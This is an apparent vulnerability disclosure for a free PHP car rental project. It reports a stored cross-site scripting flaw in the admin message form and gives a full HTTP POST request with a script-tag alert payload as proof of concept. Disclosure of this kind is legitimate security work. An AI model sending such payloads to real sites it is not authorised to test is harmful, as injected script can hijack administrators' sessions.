====================================================================
Car Rental Script - Stored XSS
====================================================================
####################################################################
.:. Author         : Yussef Dajdaj
.:. Contact        :
.:. Vendor         : https://projectworlds.in/
.:. Script           : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date:            : 8/7/2020
.:. Tested on:   : Tested on: Window 10 64 bit environment || XAMPP
####################################################################

Description: The application allows an anthenticated user to send a msg to the app administrator, parameter message is vulnerable to XSS injections.

===[ Exploit ]===

[*] Stored Cross Site Scripting
=================================

I. Persistent XSS

POST /testing/message_admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/testing/message_admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=noml4n6pvqi6tn83i8quqebtva
Connection: close
Upgrade-Insecure-Requests: 1



message=<script>alert(1);</script>&send=Send+Message